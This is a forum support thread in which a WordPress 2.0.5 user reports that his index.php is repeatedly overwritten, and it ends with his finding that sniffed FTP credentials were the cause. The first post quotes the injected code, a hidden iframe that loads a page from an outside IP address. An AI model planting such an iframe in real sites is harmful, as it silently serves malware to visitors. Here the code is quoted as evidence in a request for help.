hacking wordpress

  • Hi, I have a problem with wordpress 2.0.5.
    Periodically my firstpage (index.php) was overwrite with this code:
    ——————————————————–
    <iframe src=”https://81.29.241.232/user2/adam0111/index.php&#8221; width=”150″ height=”150″ style=”display:none”></iframe>
    <?php
    /* Short and sweet */
    define(‘WP_USE_THEMES’, true);
    require(‘./wp-blog-header.php’);
    ?>
    ———————————————————

    see:
    https://www.cicoira.it

    Can I prevent this attack?

    thanks for Help!

Viewing 11 replies - 1 through 11 (of 11 total)

  • 1. Inform your host immediately about the hack. It might happen server-wide.
    2. Make sure you don’t have any file or folder that is world writable (chmod 666 and 777, respectively).

    You may also want to read: https://codex.www.ads-software.com/Hardening_Wordpress

    A quick Google search and some rough translating shows that that’s probably the TR/Click.Small.KJ.31 virus. Not sure if that would be for teh server or your own PC when you uploaded the files.

    Upload a good version of the index.php file and set the file permission to 444 (read only access, no write).
    If you need to change something, change the file permission to 644, do your editing, then come back to 444.
    It should protect you (not 100% guaranteed)
    You can do the same with the wp-config.php file.

    Thread Starter gcicoira

    (@gcicoira)

    hi
    if I change index.php permission to 444, i have this error:

    Internal Server Error
    The server encountered an internal error or misconfiguration and was unable to complete your request.

    Please contact the server administrator, [email protected] and inform them of the time the error occurred, and anything you might have done that may have caused the error.

    More information about this error may be available in the server error log.

    with permission 644 the file index.php will be replaced with hacking code…

    Help

    You mean you put up a clean file and it gets infected instantly?
    What did you host say when you contacted them?

    Thread Starter gcicoira

    (@gcicoira)

    Hi,

    My host say that is a wordpress code problem.
    For my host it’s all ok.

    My index.php is replaced every monday.

    Any Idea?

    thanks

    Thread Starter gcicoira

    (@gcicoira)

    Help

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.ads-software.com Admin

    Get a new host. It’s not a WordPress code problem, and if they’re not willing to help you fix it, then you don’t need to be dealing with them.

    Gotta agree. We’ve already told you the issue. Either your computer or your host’s computer is infected.

    3rd agree, get a new host, that’s not a wordpress vulnerability.

    Thread Starter gcicoira

    (@gcicoira)

    Eureka!

    I have resolved my problem… I managed my blog with Net2ftp on my website https://www.cicoira.it/ftp and someone have sniffed my username/password. I have changed my FTP password for the website and I haven’t got any problem.

    Thanks

    Gianpiero

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘hacking wordpress’ is closed to new replies.

Tags